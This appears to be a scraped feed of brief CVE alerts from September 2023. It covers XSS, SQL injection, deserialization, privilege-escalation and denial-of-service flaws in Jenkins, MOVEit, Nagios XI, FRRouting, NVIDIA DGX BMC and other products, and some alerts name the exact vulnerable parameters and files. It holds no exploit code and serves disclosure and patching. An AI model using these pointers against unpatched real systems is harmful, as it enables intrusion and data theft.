🚨 CVE-2023-43377A cross-site scripting (XSS) vulnerability in /hoteldruid/visualizza_contratto.php of Hoteldruid v3.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the destinatario_email1 parameter.🎖@cveNotify |
|
| 2023-09-20 21:58:39 |
🚨 CVE-2023-3891Race condition in Lapce v0.2.8 allows an attacker to elevate privileges on the system🎖@cveNotify |
|
| 2023-09-20 21:58:38 |
🚨 CVE-2023-26141Versions of the package sidekiq before 7.1.3 are vulnerable to Denial of Service (DoS) due to insufficient checks in the dashboard-charts.js file. An attacker can exploit this vulnerability by manipulating the localStorage value which will cause excessive polling requests.🎖@cveNotify |
|
| 2023-09-20 21:58:33 |
🚨 CVE-2023-39044An information leak in ajino-Shiretoko Line v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-09-20 21:58:32 |
🚨 CVE-2023-40618A reflected cross-site scripting (XSS) vulnerability in OpenKnowledgeMaps Head Start versions 4, 5, 6, 7 as well as Visual Project Explorer 1.0, allows remote attackers to execute arbitrary JavaScript in the web browser of a user, by including a malicious payload into the 'service' parameter in 'headstart_snapshot.php'.🎖@cveNotify |
|
| 2023-09-20 21:58:31 |
🚨 CVE-2023-40619phpPgAdmin 7.14.4 and earlier is vulnerable to deserialization of untrusted data which may lead to remote code execution because user-controlled data is directly passed to the PHP 'unserialize()' function in multiple places. An example is the functionality to manage tables in 'tables.php' where the 'ma[]' POST parameter is deserialized.🎖@cveNotify |
|
| 2023-09-20 21:58:30 |
🚨 CVE-2023-20594Improper initialization of variables in the DXE driver may allow a privileged user to leak sensitive information via local access.🎖@cveNotify |
|
| 2023-09-20 21:58:26 |
🚨 CVE-2023-43494Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.🎖@cveNotify |
|
| 2023-09-20 21:58:25 |
🚨 CVE-2023-43495Jenkins 2.423 and earlier, LTS 2.414.1 and earlier does not escape the value of the 'caption' constructor parameter of 'ExpandableDetailsNote', resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control this parameter.🎖@cveNotify |
|
| 2023-09-20 21:58:24 |
🚨 CVE-2023-43497In Jenkins 2.423 and earlier, LTS 2.414.1 and earlier, processing file uploads using the Stapler web framework creates temporary files in the default system temporary directory with the default permissions for newly created files, potentially allowing attackers with access to the Jenkins controller file system to read and write the files before they are used.🎖@cveNotify |
|
| 2023-09-20 21:58:23 |
🚨 CVE-2023-43498In Jenkins 2.423 and earlier, LTS 2.414.1 and earlier, processing file uploads using MultipartFormDataParser creates temporary files in the default system temporary directory with the default permissions for newly created files, potentially allowing attackers with access to the Jenkins controller file system to read and write the files before they are used.🎖@cveNotify |
|
| 2023-09-20 19:58:35 |
🚨 CVE-2023-42656In Progress MOVEit Transfer versions released before 2021.1.8 (13.1.8), 2022.0.8 (14.0.8), 2022.1.9 (14.1.9), 2023.0.6 (15.0.6), a reflected cross-site scripting (XSS) vulnerability has been identified in MOVEit Transfer's web interface. An attacker could craft a malicious payload targeting MOVEit Transfer users during the package composition procedure. If a MOVEit user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victims browser.🎖@cveNotify |
|
| 2023-09-20 19:58:34 |
🚨 CVE-2023-42660In Progress MOVEit Transfer versions released before 2021.1.8 (13.1.8), 2022.0.8 (14.0.8), 2022.1.9 (14.1.9), 2023.0.6 (15.0.6), a SQL injection vulnerability has been identified in the MOVEit Transfer machine interface that could allow an authenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to the MOVEit Transfer machine interface which could result in modification and disclosure of MOVEit database content.🎖@cveNotify |
|
| 2023-09-20 19:58:33 |
🚨 CVE-2023-43494Jenkins 2.50 through 2.423 (both inclusive), LTS 2.60.1 through 2.414.1 (both inclusive) does not exclude sensitive build variables (e.g., password parameter values) from the search in the build history widget, allowing attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters until the correct sequence is discovered.🎖@cveNotify |
|
| 2023-09-20 19:58:32 |
🚨 CVE-2023-43495Jenkins 2.423 and earlier, LTS 2.414.1 and earlier does not escape the value of the 'caption' constructor parameter of 'ExpandableDetailsNote', resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control this parameter.🎖@cveNotify |
|
| 2023-09-20 19:58:30 |
🚨 CVE-2023-43496Jenkins 2.423 and earlier, LTS 2.414.1 and earlier creates a temporary file in the system temporary directory with the default permissions for newly created files when installing a plugin from a URL, potentially allowing attackers with access to the system temporary directory to replace the file before it is installed in Jenkins, potentially resulting in arbitrary code execution.🎖@cveNotify |
|
| 2023-09-20 19:58:29 |
🚨 CVE-2023-43497In Jenkins 2.423 and earlier, LTS 2.414.1 and earlier, processing file uploads using the Stapler web framework creates temporary files in the default system temporary directory with the default permissions for newly created files, potentially allowing attackers with access to the Jenkins controller file system to read and write the files before they are used.🎖@cveNotify |
|
| 2023-09-20 19:58:28 |
🚨 CVE-2023-43498In Jenkins 2.423 and earlier, LTS 2.414.1 and earlier, processing file uploads using MultipartFormDataParser creates temporary files in the default system temporary directory with the default permissions for newly created files, potentially allowing attackers with access to the Jenkins controller file system to read and write the files before they are used.🎖@cveNotify |
|
| 2023-09-20 19:58:27 |
🚨 CVE-2023-43499Jenkins Build Failure Analyzer Plugin 2.4.1 and earlier does not escape Failure Cause names in build logs, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create or update Failure Causes.🎖@cveNotify |
|
| 2023-09-20 19:58:26 |
🚨 CVE-2023-43500A cross-site request forgery (CSRF) vulnerability in Jenkins Build Failure Analyzer Plugin 2.4.1 and earlier allows attackers to connect to an attacker-specified hostname and port using attacker-specified username and password.🎖@cveNotify |
|
| 2023-09-20 19:58:25 |
🚨 CVE-2023-43501A missing permission check in Jenkins Build Failure Analyzer Plugin 2.4.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified hostname and port using attacker-specified username and password.🎖@cveNotify |
|
| 2023-09-20 19:58:24 |
🚨 CVE-2023-43502A cross-site request forgery (CSRF) vulnerability in Jenkins Build Failure Analyzer Plugin 2.4.1 and earlier allows attackers to delete Failure Causes.🎖@cveNotify |
|
| 2023-09-20 19:58:23 |
🚨 CVE-2023-25588A flaw was found in Binutils. The field `the_bfd` of `asymbol`struct is uninitialized in the `bfd_mach_o_get_synthetic_symtab` function, which may lead to an application crash and local denial of service.🎖@cveNotify |
|
| 2023-09-20 19:58:22 |
🚨 CVE-2023-4959A flaw was found in Quay. Cross-site request forgery (CSRF) attacks force a user to perform unwanted actions in an application. During the pentest, it was detected that the config-editor page is vulnerable to CSRF. The config-editor page is used to configure the Quay instance. By coercing the victim’s browser into sending an attacker-controlled request from another domain, it is possible to reconfigure the Quay instance (including adding users with admin privileges).🎖@cveNotify |
|
| 2023-09-20 19:58:20 |
🚨 CVE-2023-25586A flaw was found in Binutils. A logic fail in the bfd_init_section_decompress_status function may lead to the use of an uninitialized variable that can cause a crash and local denial of service.🎖@cveNotify |
|
| 2023-09-20 19:58:19 |
🚨 CVE-2023-28614Freewill iFIS (aka SMART Trade) 20.01.01.04 allows OS Command Injection via shell metacharacters to a report page.🎖@cveNotify |
|
| 2023-09-20 19:58:17 |
🚨 CVE-2023-4662Execution with Unnecessary Privileges vulnerability in Saphira Saphira Connect allows Remote Code Inclusion.This issue affects Saphira Connect: before 9.🎖@cveNotify |
|
| 2023-09-20 19:58:16 |
🚨 CVE-2023-32461Dell PowerEdge BIOS and Dell Precision BIOS contain a buffer overflow vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability, leading to corrupt memory and potentially escalate privileges. 🎖@cveNotify |
|
| 2023-09-20 19:58:15 |
🚨 CVE-2023-42398An issue in zzCMS v.2023 allows a remote attacker to execute arbitrary code and obtain sensitive information via the ueditor component in controller.php.🎖@cveNotify |
|
| 2023-09-20 19:58:14 |
🚨 CVE-2023-4665Incorrect Execution-Assigned Permissions vulnerability in Saphira Saphira Connect allows Privilege Escalation.This issue affects Saphira Connect: before 9.🎖@cveNotify |
|
| 2023-09-20 19:58:13 |
🚨 CVE-2023-4664Incorrect Default Permissions vulnerability in Saphira Saphira Connect allows Privilege Escalation.This issue affects Saphira Connect: before 9.🎖@cveNotify |
|
| 2023-09-20 14:58:27 |
🚨 CVE-2023-4236A flaw in the networking code handling DNS-over-TLS queries may cause `named` to terminate unexpectedly due to an assertion failure. This happens when internal data structures are incorrectly reused under significant DNS-over-TLS query load.This issue affects BIND 9 versions 9.18.0 through 9.18.18 and 9.18.11-S1 through 9.18.18-S1.🎖@cveNotify |
|
| 2023-09-20 14:58:25 |
🚨 CVE-2023-41436Cross Site Scripting vulnerability in CSZCMS v.1.3.0 allows a local attacker to execute arbitrary code via a crafted script to the Additional Meta Tag parameter in the Pages Content Menu component.🎖@cveNotify |
|
| 2023-09-20 14:58:22 |
🚨 CVE-2023-4982Cross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 23.9.0.🎖@cveNotify |
|
| 2023-09-20 14:58:21 |
🚨 CVE-2023-4981Cross-site Scripting (XSS) - DOM in GitHub repository librenms/librenms prior to 23.9.0.🎖@cveNotify |
|
| 2023-09-20 14:58:20 |
🚨 CVE-2023-4979Cross-site Scripting (XSS) - Reflected in GitHub repository librenms/librenms prior to 23.9.0.🎖@cveNotify |
|
| 2023-09-20 14:58:19 |
🚨 CVE-2023-4980Cross-site Scripting (XSS) - Generic in GitHub repository librenms/librenms prior to 23.9.0.🎖@cveNotify |
|
| 2023-09-20 14:58:15 |
🚨 CVE-2023-4977 Code Injection in GitHub repository librenms/librenms prior to 23.9.0.🎖@cveNotify |
|
| 2023-09-20 14:58:14 |
🚨 CVE-2023-40985An issue was discovered in Webmin 2.100. The File Manager functionality allows an attacker to exploit a Cross-Site Scripting (XSS) vulnerability. By providing a malicious payload, an attacker can inject arbitrary code, which is then executed within the context of the victim's browser when any file is searched/replaced.🎖@cveNotify |
|
| 2023-09-20 14:58:13 |
🚨 CVE-2023-40984A reflected cross-site scripting (XSS) vulnerability in the File Manager function of Webmin v2.100 allows attackers to execute malicious scripts via injecting a crafted payload into the Replace in Results file.🎖@cveNotify |
|
| 2023-09-20 12:58:29 |
🚨 CVE-2023-25531NVIDIA DGX H100 BMC contains a vulnerability in IPMI, where an attacker may cause insufficient protection of credentials. A successful exploit of this vulnerability may lead to code execution, denial of service, information disclosure, and escalation of privileges.🎖@cveNotify |
|
| 2023-09-20 12:58:28 |
🚨 CVE-2023-38887File Upload vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to execute arbitrary code and obtain sensitive information via the extension filtering and renaming functions.🎖@cveNotify |
|
| 2023-09-20 12:58:27 |
🚨 CVE-2023-38886An issue in Dolibarr ERP CRM v.17.0.1 and before allows a remote privileged attacker to execute arbitrary code via a crafted command/script.🎖@cveNotify |
|
| 2023-09-20 12:58:23 |
🚨 CVE-2023-31011NVIDIA DGX H100 BMC contains a vulnerability in the REST service where an attacker may cause improper input validation. A successful exploit of this vulnerability may lead to escalation of privileges and information disclosure.🎖@cveNotify |
|
| 2023-09-20 12:58:22 |
🚨 CVE-2023-31012NVIDIA DGX H100 BMC contains a vulnerability in the REST service where an attacker may cause improper input validation. A successful exploit of this vulnerability may lead to escalation of privileges and information disclosure.🎖@cveNotify |
|
| 2023-09-20 12:58:21 |
🚨 CVE-2023-31013NVIDIA DGX H100 BMC contains a vulnerability in the REST service, where an attacker may cause improper input validation. A successful exploit of this vulnerability may lead to escalation of privileges and information disclosure.🎖@cveNotify |
|
| 2023-09-20 12:58:18 |
🚨 CVE-2023-31014NVIDIA GeForce Now for Android contains a vulnerability in the game launcher component, where a malicious application on the same device can process the implicit intent meant for the streamer component. A successful exploit of this vulnerability may lead to limited information disclosure, denial of service, and code execution.🎖@cveNotify |
|
| 2023-09-20 12:58:17 |
🚨 CVE-2020-24089An issue was discovered in ImfHpRegFilter.sys in IOBit Malware Fighter version 8.0.2, allows local attackers to cause a denial of service (DoS).🎖@cveNotify |
|
| 2023-09-20 12:58:16 |
🚨 CVE-2023-36319File Upload vulnerability in Openupload Stable v.0.4.3 allows a remote attacker to execute arbitrary code via the action parameter of the compress-inc.php file.🎖@cveNotify |
|
| 2023-09-20 12:58:13 |
🚨 CVE-2023-40931A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php🎖@cveNotify |
|
| 2023-09-20 12:58:12 |
🚨 CVE-2023-40933A SQL injection vulnerability in Nagios XI v5.11.1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function.🎖@cveNotify |
|
| 2023-09-20 12:58:11 |
🚨 CVE-2022-45447M4 PDF plugin for Prestashop sites, in its 3.2.3 version and before, is vulnerable to a directory traversal vulnerability. The “f” parameter is not properly checked in the resource /m4pdf/pdf.php, returning any file given its relative path. An attacker that exploits this vulnerability could download /etc/passwd from the server if the file exists.🎖@cveNotify |
|
| 2023-09-20 11:58:27 |
🚨 CVE-2023-22644An Innsertion of Sensitive Information into Log File vulnerability in SUSE SUSE Manager Server Module 4.2 spacewalk-java, SUSE SUSE Manager Server Module 4.3 spacewalk-java causes sensitive information to be logged.This issue affects SUSE Manager Server Module 4.2: before 4.2.50-150300.3.66.5; SUSE Manager Server Module 4.3: before 4.3.58-150400.3.46.4.🎖@cveNotify |
|
| 2023-09-20 11:58:26 |
🚨 CVE-2023-41374Double free issue exists in Kostac PLC Programming Software Version 1.6.11.0 and earlier. Arbitrary code may be executed by having a user open a specially crafted project file which was saved using Kostac PLC Programming Software Version 1.6.9.0 and earlier because the issue exists in parsing of KPP project files. The vendor states that Kostac PLC Programming Software Version 1.6.10.0 or later implements the function which prevents a project file alteration. Therefore, to mitigate the impact of these vulnerabilities, a project file which was saved using Kostac PLC Programming Software Version 1.6.9.0 and earlier needs to be saved again using Kostac PLC Programming Software Version 1.6.10.0 or later.🎖@cveNotify |
|
| 2023-09-20 11:58:25 |
🚨 CVE-2023-41375Use after free vulnerability exists in Kostac PLC Programming Software Version 1.6.11.0. Arbitrary code may be executed by having a user open a specially crafted project file which was saved using Kostac PLC Programming Software Version 1.6.9.0 and earlier because the issue exists in parsing of KPP project files. The vendor states that Kostac PLC Programming Software Version 1.6.10.0 or later implements the function which prevents a project file alteration. Therefore, to mitigate the impact of these vulnerabilities, a project file which was saved using Kostac PLC Programming Software Version 1.6.9.0 and earlier needs to be saved again using Kostac PLC Programming Software Version 1.6.10.0 or later.🎖@cveNotify |
|
| 2023-09-20 11:58:24 |
🚨 CVE-2022-47560** UNSUPPPORTED WHEN ASSIGNED ** The lack of web request control on ekorCCP and ekorRCI devices allows a potential attacker to create custom requests to execute malicious actions when a user is logged in.🎖@cveNotify |
|
| 2023-09-20 11:58:22 |
🚨 CVE-2022-47561** UNSUPPPORTED WHEN ASSIGNED ** The web application stores credentials in clear text in the "admin.xml" file, which can be accessed without logging into the website, which could allow an attacker to obtain credentials related to all users, including admin users, in clear text, and use them to subsequently execute malicious actions.🎖@cveNotify |
|
| 2023-09-20 11:58:21 |
🚨 CVE-2022-47562** UNSUPPPORTED WHEN ASSIGNED ** Vulnerability in the RCPbind service running on UDP port (111), allowing a remote attacker to create a denial of service (DoS) condition.🎖@cveNotify |
|
| 2023-09-20 11:58:20 |
🚨 CVE-2023-43618An issue was discovered in Croc through 9.6.5. The protocol requires a sender to provide its local IP addresses in cleartext via an ips? message.🎖@cveNotify |
|
| 2023-09-20 11:58:19 |
🚨 CVE-2023-43620An issue was discovered in Croc through 9.6.5. A sender may place ANSI or CSI escape sequences in a filename to attack the terminal device of a receiver.🎖@cveNotify |
|
| 2023-09-20 11:58:18 |
🚨 CVE-2023-43621An issue was discovered in Croc through 9.6.5. The shared secret, located on a command line, can be read by local users who list all processes and their arguments.🎖@cveNotify |
|
| 2023-09-20 11:58:17 |
🚨 CVE-2023-2163Incorrect verifier pruning in BPF in Linux Kernel >=5.4 leads to unsafecode paths being incorrectly marked as safe, resulting in arbitrary read/write inkernel memory, lateral privilege escalation, and container escape.🎖@cveNotify |
|
| 2023-09-20 11:58:16 |
🚨 CVE-2023-43616An issue was discovered in Croc through 9.6.5. A sender can cause a receiver to overwrite files during ZIP extraction.🎖@cveNotify |
|
| 2023-09-20 11:58:15 |
🚨 CVE-2023-43617An issue was discovered in Croc through 9.6.5. When a custom shared secret is used, the sender and receiver may divulge parts of this secret to an untrusted Relay, as part of composing a room name.🎖@cveNotify |
|
| 2023-09-20 11:58:14 |
🚨 CVE-2023-43619An issue was discovered in Croc through 9.6.5. A sender may send dangerous new files to a receiver, such as executable content or a .ssh/authorized_keys file.🎖@cveNotify |
|
| 2023-09-20 11:58:13 |
🚨 CVE-2023-26144Versions of the package graphql from 16.3.0 and before 16.8.1 are vulnerable to Denial of Service (DoS) due to insufficient checks in the OverlappingFieldsCanBeMergedRule.ts file when parsing large queries. This vulnerability allows an attacker to degrade system performance.**Note:** It was not proven that this vulnerability can crash the process.🎖@cveNotify |
|
| 2023-09-20 05:58:35 |
🚨 CVE-2023-31015NVIDIA DGX H100 BMC contains a vulnerability in the REST service where a host user may cause as improper authentication issue. A successful exploit of this vulnerability may lead to escalation of privileges, information disclosure, code execution, and denial of service.🎖@cveNotify |
|
| 2023-09-20 05:58:34 |
🚨 CVE-2022-46146Prometheus Exporter Toolkit is a utility package to build exporters. Prior to versions 0.7.2 and 0.8.2, if someone has access to a Prometheus web.yml file and users' bcrypted passwords, they can bypass security by poisoning the built-in authentication cache. Versions 0.7.2 and 0.8.2 contain a fix for the issue. There is no workaround, but attacker must have access to the hashed password to use this functionality.🎖@cveNotify |
|
| 2023-09-20 05:58:33 |
🚨 CVE-2023-25526NVIDIA Cumulus Linux contains a vulnerability in neighmgrd and nlmanager where an attacker on an adjacent network may cause an uncaught exception by injecting a crafted packet. A successful exploit may lead to denial of service.🎖@cveNotify |
|
| 2023-09-20 05:58:32 |
🚨 CVE-2023-25529NVIDIA DGX H100 BMC contains a vulnerability in the host KVM daemon, where an unauthenticated attacker may cause a leak of another user’s session token by observing timing discrepancies between server responses. A successful exploit of this vulnerability may lead to information disclosure, escalation of privileges, and data tampering.🎖@cveNotify |
|
| 2023-09-20 05:58:28 |
🚨 CVE-2023-25529NVIDIA DGX H100 BMC contains a vulnerability in the host KVM daemon, where an unauthenticated attacker may cause a leak of another user’s session token by observing timing discrepancies between server responses. A successful exploit of this vulnerability may lead to information disclosure, escalation of privileges, and data tampering.🎖@cveNotify |
|
| 2023-09-20 05:58:27 |
🚨 CVE-2023-25525NVIDIA Cumulus Linux contains a vulnerability in forwarding where a VxLAN-encapsulated IPv6 packet received on an SVI interface with DMAC/DIPv6 set to the link-local address of the SVI interface may be incorrectly forwarded. A successful exploit may lead to information disclosure.🎖@cveNotify |
|
| 2023-09-20 05:58:26 |
🚨 CVE-2023-25527NVIDIA DGX H100 BMC contains a vulnerability in the host KVM daemon, where an authenticated local attacker may cause corruption of kernel memory. A successful exploit of this vulnerability may lead to arbitrary kernel code execution, denial of service, escalation of privileges, information disclosure, and data tampering.🎖@cveNotify |
|
| 2023-09-20 05:58:25 |
🚨 CVE-2023-25532NVIDIA DGX H100 BMC contains a vulnerability in IPMI, where an attacker may cause insufficient protection of credentials. A successful exploit of this vulnerability may lead to information disclosure.🎖@cveNotify |
|
| 2023-09-20 05:58:24 |
🚨 CVE-2023-25528NVIDIA DGX H100 baseboard management controller (BMC) contains a vulnerability in a web server plugin, where an unauthenticated attacker may cause a stack overflow by sending a specially crafted network packet. A successful exploit of this vulnerability may lead to arbitrary code execution, denial of service, information disclosure, and data tampering.🎖@cveNotify |
|
| 2023-09-20 05:58:21 |
🚨 CVE-2023-25534NVIDIA DGX H100 BMC contains a vulnerability in IPMI, where an attacker may cause improper input validation. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.🎖@cveNotify |
|
| 2023-09-20 05:58:20 |
🚨 CVE-2023-25530NVIDIA DGX H100 BMC contains a vulnerability in the KVM service, where an attacker may cause improper input validation. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, and information disclosure.🎖@cveNotify |
|
| 2023-09-20 05:58:19 |
🚨 CVE-2023-25531NVIDIA DGX H100 BMC contains a vulnerability in IPMI, where an attacker may cause insufficient protection of credentials. A successful exploit of this vulnerability may lead to code execution, denial of service, information disclosure, and escalation of privileges.🎖@cveNotify |
|
| 2023-09-20 05:58:18 |
🚨 CVE-2023-25533NVIDIA DGX H100 BMC contains a vulnerability in the web UI, where an attacker may cause improper input validation. A successful exploit of this vulnerability may lead to information disclosure, code execution, and escalation of privileges.🎖@cveNotify |
|
| 2023-09-20 05:58:14 |
🚨 CVE-2023-38887File Upload vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to execute arbitrary code and obtain sensitive information via the extension filtering and renaming functions.🎖@cveNotify |
|
| 2023-09-20 05:58:13 |
🚨 CVE-2023-38886An issue in Dolibarr ERP CRM v.17.0.1 and before allows a remote privileged attacker to execute arbitrary code via a crafted command/script.🎖@cveNotify |
|
| 2023-09-20 05:58:12 |
🚨 CVE-2023-39575A reflected cross-site scripting (XSS) vulnerability in the url_str URL parameter of ISL ARP Guard v4.0.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2023-09-20 01:58:36 |
🚨 CVE-2023-40933A SQL injection vulnerability in Nagios XI v5.11.1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function.🎖@cveNotify |
|
| 2023-09-20 01:58:35 |
🚨 CVE-2023-40934A SQL injection vulnerability in Nagios XI 5.11.1 and below allows authenticated attackers with privileges to manage host escalations in the Core Configuration Manager to execute arbitrary SQL commands via the host escalation notification settings.🎖@cveNotify |
|
| 2023-09-20 01:58:34 |
🚨 CVE-2023-41909An issue was discovered in FRRouting FRR through 9.0. bgp_nlri_parse_flowspec in bgpd/bgp_flowspec.c processes malformed requests with no attributes, leading to a NULL pointer dereference.🎖@cveNotify |
|
| 2023-09-20 01:58:33 |
🚨 CVE-2023-38802FRRouting FRR 7.5.1 through 9.0 and Pica8 PICOS 4.3.3.2 allow a remote attacker to cause a denial of service via a crafted BGP update with a corrupted attribute 23 (Tunnel Encapsulation).🎖@cveNotify |
|
| 2023-09-20 01:58:31 |
🚨 CVE-2023-41358An issue was discovered in FRRouting FRR through 9.0. bgpd/bgp_packet.c processes NLRIs if the attribute length is zero.🎖@cveNotify |
|
| 2023-09-20 01:58:30 |
🚨 CVE-2023-41361An issue was discovered in FRRouting FRR 9.0. bgpd/bgp_open.c does not check for an overly large length of the rcv software version.🎖@cveNotify |
|
| 2023-09-20 01:58:28 |
🚨 CVE-2023-31490An issue found in Frrouting bgpd v.8.4.2 allows a remote attacker to cause a denial of service via the bgp_attr_psid_sub() function.🎖@cveNotify |
|
| 2023-09-20 01:58:27 |
🚨 CVE-2022-40302An issue was discovered in bgpd in FRRouting (FRR) through 8.4. By crafting a BGP OPEN message with an option of type 0xff (Extended Length from RFC 9072), attackers may cause a denial of service (assertion failure and daemon restart, or out-of-bounds read). This is possible because of inconsistent boundary checks that do not account for reading 3 bytes (instead of 2) in this 0xff case.🎖@cveNotify |
|
| 2023-09-20 01:58:26 |
🚨 CVE-2022-40318An issue was discovered in bgpd in FRRouting (FRR) through 8.4. By crafting a BGP OPEN message with an option of type 0xff (Extended Length from RFC 9072), attackers may cause a denial of service (assertion failure and daemon restart, or out-of-bounds read). This is possible because of inconsistent boundary checks that do not account for reading 3 bytes (instead of 2) in this 0xff case. NOTE: this behavior occurs in bgp_open_option_parse in the bgp_open.c file, a different location (with a different attack vector) relative to CVE-2022-40302.🎖@cveNotify |
|
| 2023-09-20 01:58:25 |
🚨 CVE-2022-43681An out-of-bounds read exists in the BGP daemon of FRRouting FRR through 8.4. When sending a malformed BGP OPEN message that ends with the option length octet (or the option length word, in case of an extended OPEN message), the FRR code reads of out of the bounds of the packet, throwing a SIGABRT signal and exiting. This results in a bgpd daemon restart, causing a Denial-of-Service condition.🎖@cveNotify |
|
| 2023-09-20 01:58:24 |
🚨 CVE-2022-36440A reachable assertion was found in Frrouting frr-bgpd 8.3.0 in the peek_for_as4_capability function. Attackers can maliciously construct BGP open packets and send them to BGP peers running frr-bgpd, resulting in DoS.🎖@cveNotify |
|
| 2023-09-20 01:58:23 |
🚨 CVE-2019-20392An invalid memory access flaw is present in libyang before v1.0-r1 in the function resolve_feature_value() when an if-feature statement is used inside a list key node, and the feature used is not defined. Applications that use libyang to parse untrusted input yang files may crash.🎖@cveNotify |
|
| 2023-09-20 01:58:22 |
🚨 CVE-2019-20398A NULL pointer dereference is present in libyang before v1.0-r3 in the function lys_extension_instances_free() due to a copy of unresolved extensions in lys_restr_dup(). Applications that use libyang to parse untrusted input yang files may crash.🎖@cveNotify |
|
| 2023-09-20 01:58:21 |
🚨 CVE-2019-20395A stack consumption issue is present in libyang before v1.0-r1 due to the self-referential union type containing leafrefs. Applications that use libyang to parse untrusted input yang files may crash.🎖@cveNotify |
|
| 2023-09-20 01:58:17 |
🚨 CVE-2019-20397A double-free is present in libyang before v1.0-r1 in the function yyparse() when an organization field is not terminated. Applications that use libyang to parse untrusted input yang files may be vulnerable to this flaw, which would cause a crash or potentially code execution.🎖@cveNotify |
|
| 2023-09-20 01:58:16 |
🚨 CVE-2019-20394A double-free is present in libyang before v1.0-r3 in the function yyparse() when a type statement in used in a notification statement. Applications that use libyang to parse untrusted input yang files may be vulnerable to this flaw, which would cause a crash or potentially code execution.🎖@cveNotify |
|
| 2023-09-20 01:58:15 |
🚨 CVE-2019-20396A segmentation fault is present in yyparse in libyang before v1.0-r1 due to a malformed pattern statement value during lys_parse_path parsing.🎖@cveNotify |
|
| 2023-09-20 01:58:14 |
🚨 CVE-2019-20391An invalid memory access flaw is present in libyang before v1.0-r3 in the function resolve_feature_value() when an if-feature statement is used inside a bit. Applications that use libyang to parse untrusted input yang files may crash.🎖@cveNotify |
|
| 2023-09-19 23:58:32 |
🚨 CVE-2023-41349ASUS router RT-AX88U has a vulnerability of using externally controllable format strings within its Advanced Open VPN function. An authenticated remote attacker can exploit the exported OpenVPN configuration to execute an externally-controlled format string attack, resulting in sensitivity information leakage, or forcing the device to reset and permanent denial of service.🎖@cveNotify |
|
| 2023-09-19 23:58:31 |
🚨 CVE-2020-36766An issue was discovered in the Linux kernel before 5.8.6. drivers/media/cec/core/cec-api.c leaks one byte of kernel memory on specific hardware to unprivileged users, because of directly assigning log_addrs with a hole in the struct.🎖@cveNotify |
|
| 2023-09-19 23:58:30 |
🚨 CVE-2023-5031A vulnerability was found in OpenRapid RapidCMS 1.3.1. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/article/article-add.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-239875.🎖@cveNotify |
|
| 2023-09-19 23:58:29 |
🚨 CVE-2023-2995The Leyka WordPress plugin through 3.30.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-09-19 23:58:28 |
🚨 CVE-2023-4376The Serial Codes Generator and Validator with WooCommerce Support WordPress plugin before 2.4.15 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-09-19 23:58:26 |
🚨 CVE-2023-41834Improper Neutralization of CRLF Sequences in HTTP Headers in Apache Flink Stateful Functions 3.1.0, 3.1.1 and 3.2.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via crafted HTTP requests. Attackers could potentially inject malicious content into the HTTP response that is sent to the user's browser. Users should upgrade to Apache Flink Stateful Functions version 3.3.0.🎖@cveNotify |
|
| 2023-09-19 23:58:25 |
🚨 CVE-2023-20243A vulnerability in the RADIUS message processing feature of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause the affected system to stop processing RADIUS packets. This vulnerability is due to improper handling of certain RADIUS accounting requests. An attacker could exploit this vulnerability by sending a crafted authentication request to a network access device (NAD) that uses Cisco ISE for authentication, authorization, and accounting (AAA). This would eventually result in the NAD sending a RADIUS accounting request packet to Cisco ISE. An attacker could also exploit this vulnerability by sending a crafted RADIUS accounting request packet to Cisco ISE directly if the RADIUS shared secret is known. A successful exploit could allow the attacker to cause the RADIUS process to unexpectedly restart, resulting in authentication or authorization timeouts and denying legitimate users access to the network or service. Clients already authenticated to the network would not be affected. Note: To recover the ability to process RADIUS packets, a manual restart of the affected Policy Service Node (PSN) may be required. For more information, see the Details ["#details"] section of this advisory.🎖@cveNotify |
|
| 2023-09-19 23:58:24 |
